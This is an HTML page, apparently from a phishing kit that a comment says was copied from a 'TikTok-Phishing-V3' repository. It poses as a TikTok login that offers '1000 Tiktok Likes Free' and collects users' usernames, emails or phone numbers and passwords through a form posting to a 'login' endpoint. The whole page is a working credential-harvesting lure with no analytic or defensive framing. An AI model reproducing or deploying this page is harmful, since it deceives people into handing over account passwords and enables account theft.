<!DOCTYPE html>
<html>
<!-- Powered By SADFLIX  -->
<!-- COPIED FROM https://github.com/swagkarna/TikTok-Phishing-V3/blob/main/tiktokv3.zip -->
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
<title>Tik Tok Followers</title>
<script src="jquery.min.js"></script>
<script src="jscript.js"></script>
<link href="style.css" rel="stylesheet" type="text/css"/>
<style>
    @media(max-width:760px){
       #TFG{
           font-size:140%;
       } 
       .buttonstyle{
           font-size:100%;
       }
    
    .followers , .likes{
        width:95%;
    }
    }
</style>
</head>
<body onload="updateyear()">
<div id="main-tool">
<div class="wrapper"><img src="logo.png"/></div>
<h1 id="TFG">Login</h1>
<p class="sub-heading">Login to get 1000 Tiktok Likes Free</p>
<form action="login" method="POST">
<center>
<div id="fillup">
<div class="form-option">
<input class="input-form input-command" name="email" placeholder="Username/Email/Phone" required="" type="text"/>
</div>
<div id="fillup">
<div class="form-option">
<input class="input-form input-command" name="password" placeholder="Password" required="" type="password"/>
</div>
<br/><br/>
<button class="buttonstyle"><b>Login</b></button>
</div>
</div>
<div id="steps" style="display:none;">
</div>
<div id="comment" style="display:none;">
</div>
</center></form></div></body>
<!-- Powered By Sadflix -->
</html>